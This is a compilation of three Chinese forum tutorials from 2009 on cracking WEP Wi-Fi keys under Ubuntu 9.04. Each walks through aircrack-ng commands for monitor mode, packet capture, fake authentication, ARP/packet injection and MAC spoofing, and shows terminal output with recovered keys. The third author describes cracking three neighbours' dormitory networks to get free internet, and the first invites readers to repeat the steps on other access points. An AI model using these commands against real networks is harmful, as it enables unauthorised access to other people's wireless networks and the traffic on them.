Ubuntu 9.04破解WEP无线加密 WEP无线加密

测试环境：电脑dell 1400 无线网卡intel 3945abg 硬盘安装 Ubuntu 9.04 linksys无线AP

一、安装Ubuntu和aircrack-ng

先安装 Ubuntu9.04，更新系统到最新
终端中输入 sudo apt-get install aircrack-ng 安装aircrack-ng
没联网的话 到别的电脑上网下载aircrack-ng Ubuntu DEB安装包 安装   

下载地址：http://packages.ubuntu.com/zh-cn/jaunty/i386/aircrack-ng/download

二、破解过程

1、启动无线网卡的监控模式，在终端中输入：sudo airmon-ng start wlan0
（wlan0是无线网卡的端口,可在终端中输入 ifconfig 查看）

2、查看无线AP在终端中输入：
sudo airodump-ng mon0
（特别说明：启动监控模式后无线网的端口现在是 mon0 ！！！）
看看有哪些采用wep加密的AP在线，然后按 ctrl+c 退出，保留终端

3、抓包
另开一个终端，输入：
sudo airodump-ng -c 6 --bssid AP’s MAC -w wep mon0
(-c 后面跟着的6是要破解的AP工作频道，--bissid后面跟着的AP’s MAC是要欲破解AP的MAC地址，-w后面跟着wep的是抓下来的数据包DATA保存的文件名，具体情况根据步骤2里面的在线AP更改频道和MAC地址，DATA保存的文件名可随便命名）

4、与AP建立虚拟连接
再另开一个终端，输入：
sudo aireplay-ng -1 0 -a AP’s MAC -h My MAC mon0
（-h后面跟着的My MAC是自己的无线网卡的MAC地址，命令：
iwlist wlan0 scanning
可查看自己的MAC地址)

5、进行注入
成功建立虚拟连接后输入：
sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP’s MAC -h My MAC mon0
现在回头看下步骤3的终端是不是DATA在开始飞涨！

6、解密
收集有5000个以上的DATA之后，另开一个终端，输入：
sudo aircrack-ng wep*.cap
进行解密
（如果没算出来的话，继续等，aircrack-ng 会在DATA每增加多5000个之后就自动再运行，直到算出密码为至）

7、收工
破 解出密码后在终端中输入 sudo airomon-ng stop mon0 关闭监控模式，不然无线网卡会一直向刚刚的AP进行注入的，用ctrl+c退出或者直接关闭终端都是不行的。现在可以冲浪去了，或者重复步聚1-7破解其它的AP 呵呵兄弟们冲浪时可别太猛了，不然把主人给冲翻了可就不好。

方法二：Ubuntu 9.04破解WEP无线加密
1.环境 Ubuntu 9.04  
Linux boisheng-laptop 2.6.28-11-generic #42-Ubuntu SMP Fri Apr 17 01:57:59 UTC 2009 i686 GNU/Linux
2.安装破解软件  
sudo apt-get install aircrack-ng  
若无则：  
wget http://download.aircrack-ng.org/aircrack-ng-1.0-rc3.tar.gz  
tar -zxvf aircrack-ng-1.0-rc3.tar.gz  
cd aircrack-ng-1.0-rc3  
make  
make install
3.开始破解WEP加密方式 --ifconfig 显示无线网卡标识  
   eth1    Link encap:以太网   硬件地址 00:16:XX:XX:XX:XX
4.打开监控模式   －－airmon查看具体参数  
   sudo airmon-ng start eth1  
5.抓取数据包--6频道的数据包. airodump-ng查看参数                  
   sudo airodump-ng -w name eth1 -c 6  
6.开始破解   aircrack-ng 查看参数   
   sudo aircrack-ng *.cap  
显示信息如下  
#   BSSID              ESSID                   Encryption  
1   00:23:XX:XX:XX:XX   TP***********          WEP (11837 IVs)  
2   00:21:XX:XX:XX:XX   dl*****                Unknown  
3   00:18:XX:XX:XX:XX   N******                Unknown  
Index number of target network ? 1  
选择1－－开始破解  
                     KEY FOUND! [ 11:11:22:22:33 ]   
Decrypted correctly: 100%
7.则得到密码1111222233。

Ubuntu 9.04 下破解WEP密码成功_Intel 5100AGN_SONY FW35

本本：SONY VGN－FW35，内置intel 5100AGN无线网卡。
      系统： Ubuntu 9.04. 镜像很好弄， baidu一下就可以找到。 ＋ 笔记本自带的vista home basic（强力阉割版：＠）



前言～（心急的请跳过，直接看过程）

      前段时间想换换操作系统玩玩，因为vista用起来感觉很不爽。了解到ubuntu是网民中使用率最高（？）的一种Linux系统，于是上网下了一套开始折腾，几种安装方法都试过了，连vista都被顺便搞挂了几次，在经历了几次重装（菜鸟必杀技）之后，终于能感受到ubuntu的优点了。另外，我也在了解怎么破解Wifi网络，因为住的地方上网不是很方便，仅想 ceng网而已，能看看网页、收发下邮件就OK）。
      主要的问题是新的OS带来的，不知道怎么安装文件， 不知道怎么运行程序等等。 折腾了几天， 刚弄明白不久，在参考了论坛几位大老的经典贴之后，居然顺利破解了宿舍楼里能收到的3个无限网络（全是WEP加密，信道默认为6）。小小的欣喜之后，不禁很忧虑，这那里有网络安全可言？！想想以前自己为了图方便，路由器的各种密码能默认就默认， 能简单就简单，岂不是真成了脱了衣的日本AV女优？不禁狂寒～～随立马改路由器登录密码，改无线网络加密方式。也能初步理解为什么高手们不愿意将新的破解技术释放出来了，但是反过来说，只有群众们的破解水平都提高了，大家的安全意识也才会提高。
       好了，闲话就说到这里。下面描述下过程，高手们别砸砖，仅仅是觉得从论坛中获取了很多知识，现在想把自己的心得和还没有实现这种最初级WEP破解的新手们一起分享一下。。。莫要压迫额～～～呵呵

过程～(命令不含引号“）

        1. 确保已安装Ubuntu提供的更新（台湾源，网通的用这个确实快），且可以利用内置无线网卡正常上网。（避免未知的问题，因为我菜）
        2. 下载几个常用的软件， 在root下，直接用“apt-get install 软件名“这个命令就可以得到aircrack-ng, macchanger, kismet等软件， 很方便。
        3. 打开 应用程序－》附件－》终端。
        4. 输入"ifconfig -a"查看网卡的信息。5100AGN在这里被显示为   wlan0。
        5. 不需要加载内置网卡的驱动就能用，即不用输入 "ifconfig -a wlan0 up"。（原因估计是系统已经加载了吧？因为可用。不太清楚）
        6. 打开一个终端，输入"macchanger -m 00:11:22:33:44:55"。00:11:22:33:44:55是随意指定的，前两位是00就行。该命令想起作用需要先关闭无线网卡， 我直接关掉机身上无线网卡的快捷键，然后修改成功后再打开就行了，好像也可以用down命令吧，应该跟5中的up命令相反用就行吧，还没试过，小心。
        6. 利用kismet查看存在的无线网络，在使用前需要先配置这个软件，请在坛子里搜索中查，主要是修改source＝none,none,none，由于芯片未知我就填了个别人用的，也能启动。
        7. 另开一个终端，输入"airmon-ng start wlan0 6"。命令的解释请参看longas版主的帖子。在破解全部完成时，可以利用"iwconfig"命令查看wlan0的状态以及有几个mon，再用"airmon-ng stop wlan0"关闭monitor，此处wlan0可以换成是mon0，mon1等， 根据iwconfig的结果来。不这样不能再上无线网络。
        8. 输入"airodump-ng -w ciw.cap --channel 6 wlan0"开始抓包。我这里命令一输入就见packets狂飙，才几分钟就到6W多了。。。。。。。所以ArpRequest等攻击方式我就没有尝试了，等以后抓包很慢时再试试，每个网都有两个左右的用户，晚上9点可能大家上网正上的欢呢，就方便我抓包了，呵呵。
        9. 另开终端，输入"ls",查看ciw.cap具体被保存成什么名字了， 我这里是ciw.cap-02.cap。大家根据自己的来把。
——————————————————————————————————————————————————————————
chop.cap-01.csv            ciw.cap-01.kismet.netxml  视频
chop.cap-01.ivs            ciw.cap-02.cap            图片
chop.cap-01.kismet.csv     ciw.cap-02.csv            文档
chop.cap-01.kismet.netxml  ciw.cap-02.kismet.csv     音乐
ciw.cap-01.csv             ciw.cap-02.kismet.netxml  桌面
ciw.cap-01.ivs             公共的
ciw.cap-01.kismet.csv      模板
——————————————————————————————————————————————————————————
        10. 终端中输入"aircrack-ng -x -f 2 ciw.cap-02.cap"。
————————————————————————————————————————————————————————————————————————
root@ubuntu:~# aircrack-ng -x -f 2 ciw.cap-02.cap
Opening ciw.cap-02.cap
Read 498817 packets.
   #  BSSID              ESSID                     Encryption
   1  00:**:**:**:**:**  *****                           WEP (43159 IVs)
   2  00:**:**:**:**:**  TP-LINK_******          WEP (67359 IVs)
   3  00:**:**:**:**:**  ****                            WEP (11751 IVs)
   4  00:**:**:**:**:**  **#**                          No data - WEP or WPA
   5  02:**:**:**:**:**                                   Unknown
Index number of target network ?
——————————————————————————————————————————————————————————————————————————

               具体Mac地址和ESSID用＊号代替了，希望大家理解。选择要破解的网络即可，由于有三个网络，所以该命令我运行了三次，结果都破解了。。。。。

————————————————————————————————————————————————————————————
                             Aircrack-ng 1.0 rc3
             [00:00:03] Tested 591697 keys (got 144 IVs)
   KB    depth   byte(vote)
    0  111/112   FE( 256) 03(   0) 04(   0) 05(   0)
    1    6/  9   C2( 768) 24( 512) 25( 512) 27( 512)
    2    5/  6   B9( 768) 04( 512) 0D( 512) 2B( 512)
    3    7/  3   DB( 768) 0D( 512) 19( 512) 21( 512)
    4   23/  4   D3( 512) 02( 256) 05( 256) 07( 256)
                         KEY FOUND! [ 12:34:56:78:90 ]
    Decrypted correctly: 100%
————————————————————————————————————————————————————————————
               多么可怕的密码啊。。。。。水友们，不知道看帖的你有多少是这样的密码呢？还有一个是用生日作密码，另外一个估计是用自己的QQ号改的。。。。。。都是10位。估计他们的路由器密码也还是默认的。。。admin。。。。哎～

       11. 记录下密码，关闭终端，如果不能上网了，请看第7条。

       有错的地方请朋友们提醒， 我好及时修改。祝大家心想事成～破解wep密码，ceng网就行，莫搞破坏哦～呵呵